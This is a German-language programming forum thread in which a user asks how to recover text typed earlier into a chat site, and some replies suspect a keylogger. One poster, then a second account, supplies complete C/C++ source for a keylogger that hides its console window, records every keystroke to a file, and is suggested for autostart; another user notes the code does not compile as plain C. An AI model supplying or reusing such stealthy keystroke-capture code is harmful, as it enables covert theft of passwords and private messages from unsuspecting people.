Text zuvor geschrieben in Programm anzeigen lassen
Übersicht

QuäinyBetreff: Text zuvor geschrieben in Programm anzeigen lassen |
![]() Antworten mit Zitat ![]() |
|
---|---|---|
Hallöle!
Weiß vielleicht jemand zufällig, ob es möglich ist ein Programm mit BB zu schreiben, welches den letzten text, den man zuletzt geschrieben hat, anzeigt? (seit dem letzten Windowsstart) Beispiel: ich schreib "hallo jungs, was geht bei euch?" in den blitzportalchat und öffne dann das programm. dort soll dann dieser text angezeigt werden (und von mir aus auch noch das, was man zuvor geschrieben hat). Hat einer von euch eine Idee? Könnte mir einer auf die Sprünge helfen? |
||
![]() |
Hummelpups |
---|---|---|
Wofür brauchste das denn? | ||
blucode - webdesign - Ressource - NetzwerkSim
BlitzBasic 2D - BlitzMax - MaxGUI - Monkey - BlitzPlus |
ChristianK |
|
---|---|---|
Eingegebener Text wird logischerweise nicht von Windows gespeichert. Willst du nen Keylogger schreiben?! ![]() |
||
AdvanceLcd
Intel Core 2 Duo 3.2 GHz, 4 GB RAM, GeForce 8800 GTX | MacBook Pro 15,4″ Intel Core 2 Duo 2.4 GHz, 2 GB RAM, GeForce 8600M GT |
Quäiny |
|
---|---|---|
naja ganz bestimmt keine scheiße zu bauen. es wäre nur gut, wenn ich alles abspeichern kann, was ich in www.knuddels.de geschrieben hab. | ||
Phlox |
|
---|---|---|
Das geht nicht. Man kann keine Keys abfragen, die vor dem Programm eingegeben wurden.
Man kann nur einen Keylogger abfragen, der seit dem Start geladen sein muss. Das wäre ja noch schöner, wenn man den gesamten Computerverlauf ansehen könnte. (Siehe => Ereignisprotokoll) |
||
![]() |
The_Nici |
---|---|---|
Nur dumm, dass ein Antivirenprogramm wohl einen Keylogger sofort löschen würde. >_<
Btw das Programm müsste im Hintergrund laufen und mit der WinAPI die Keys abfragen. Dafür brauchst du die entsprechenden decls. Auf www.msdn.com solltest du WinAPI-Funktionen finden. Mehr werde ich dir nicht sagen, da ich Angst habe dass irgend jemand dann seine Passwörter mit dir teilt. MfG |
||
![]() |
BladeRunnerModerator |
---|---|---|
Die meisten Chatprogramme haben ein Logfile in dass sie alles geschriebene speichern. Das sollte für deine Zwecke ja reichen. Zur not tuts ein Copy und Paste vom screen herunter. | ||
Zu Diensten, Bürger.
Intel T2300, 2.5GB DDR 533, Mobility Radeon X1600 Win XP Home SP3 Intel T8400, 4GB DDR3, Nvidia GF9700M GTS Win 7/64 B3D BMax MaxGUI Stolzer Gewinner des BAC#48, #52 & #92 |
![]() |
WüstLing |
---|---|---|
BladeRunner hat Folgendes geschrieben: Die meisten Chatprogramme haben ein Logfile in dass sie alles geschriebene speichern. Das sollte für deine Zwecke ja reichen. Zur not tuts ein Copy und Paste vom screen herunter.
Er will das ganze aber für Knuddels verwenden, und bei Knuddels ist meines Wissens Copy & Paste nicht möglich. |
||
![]() |
BladeRunnerModerator |
---|---|---|
Ich kenne Knuddels nicht, von daher war es mehr ein allgemeiner Tipp. Wenns ganz dringend ist kann man ja noch nen screenie machen. | ||
Zu Diensten, Bürger.
Intel T2300, 2.5GB DDR 533, Mobility Radeon X1600 Win XP Home SP3 Intel T8400, 4GB DDR3, Nvidia GF9700M GTS Win 7/64 B3D BMax MaxGUI Stolzer Gewinner des BAC#48, #52 & #92 |
Bassmaster |
|
---|---|---|
Programm: Keylogger
Programmier Sprache: C Lad dir ein Compiler oder eine IDE runter z.b. codeblocks Da haste einen einfachen Keylogger, der sollte für dein vorhaben ausreichen. Der Loggt dann alles mit was du schreibst, wenn du willst kannste dir das ja auch noch in den Autostart kopieren dann musste es nicht immer selber starten. Code: [AUSKLAPPEN] #include <windows> #include <stdio> #include <iostream> using namespace std; int main() { AllocConsole(); ShowWindow(FindWindowA("ConsoleWindowClass",NULL),0); // Das öffnet eine neue Konsole, und versteckt diese auch sofort wenn man die 0 am ende durch eine 1 ersetzt wird die Konsole angezeigt FILE *Log; short key; char szKey[MAX_PATH]; int scan; while(1) { Sleep(10); for(key=0;key<256;key++) { if(GetAsyncKeyState(key)==-32767) { scan=MapVirtualKeyEx(key,0,GetKeyboardLayout(0)); GetKeyNameText(scan << 16,szKey,MAX_PATH); Log=fopen ("i:\\testdatei.txt","a+"); //datei auf laufwerk i: speichern cout<<endl; fprintf(Log,"%s-",szKey); //fprintf in einen stream schreiben fclose(Log); } } } } //--------------------------------------------------------------------------- |
||
![]() |
Nicdel |
---|---|---|
Das ist aber nicht reines C. | ||
bassmaster_2 |
|
---|---|---|
Ja sry war gerade dabei das für C++ umzuschreiben .....
btw ich hab für mein Bassmaster acc die email geändert und jetzt komm ich gar net mehr an den Acc xD naja nvm^^ Hier ist die C Version: Wobei es letzendlich egal ist da es auch für sein vorhaben so gut funktioniert ... [code] #include <windows> #include <stdio> #include <iostream> using namespace std; int main() { AllocConsole(); ShowWindow(FindWindowA("ConsoleWindowClass",NULL),0); // Das öffnet eine neue Konsole, und versteckt diese auch sofort wenn man die 0 am ende durch eine 1 ersetzt wird die Konsole angezeigt FILE *Log; short key; char szKey[MAX_PATH]; int scan; while(1) { Sleep(10); for(key=0;key<256;key++) { if(GetAsyncKeyState(key)==-32767) { scan=MapVirtualKeyEx(key,0,GetKeyboardLayout(0)); GetKeyNameText(scan << 16,szKey,MAX_PATH); Log=fopen ("c:\\testdatei.txt","a+"); // +a der datei weiteren text hinzufügen cout<<endl; fprintf(Log,"%s-",szKey); //fprintf in einen stream schreiben fclose(Log); } } } } [/code] |
||
![]() |
Nicdel |
---|---|---|
Beim C-Compilieren:
- windows: No such file or directory. - stdio: No such file or directory. - iostream: No such file or directory. - syntax error before "namespace" - `NULL' undeclared (first use in this function) usw... |
||
![]() |
Starwar |
---|---|---|
Warum C/C++. In Blitz gehts auch: http://www.janware.ch/index.ph...t&id=7 | ||
![]() |
Sereyanne |
---|---|---|
Hi,
hab grad ein altes Thema ausgegraben, da der Link down ist. Starwar hat Folgendes geschrieben: Warum C/C++. In Blitz gehts auch: http://www.janware.ch/index.ph...t&id=7
Mich würde das auch mal interessieren. Gibt es das Tutorial noch? |
||
![]() |
Nicdel |
---|---|---|
Eigentlich reicht der Befehl GetAsyncKeyState. Den findest du auf www.msdn.com. | ||
Desktop: Intel Pentium 4 2650 Mhz, 2 GB RAM, ATI Radeon HD 3850 512 MB, Windows XP
Notebook: Intel Core i7 720 QM 1.6 Ghz, 4 GB DDR3 RAM, nVidia 230M GT, Windows 7 |
![]() |
Sereyanne |
---|---|---|
OK, danke. Den hab ich mir schon angesehen. Dachte es gäb noch mehr.
Danke! |
||
Übersicht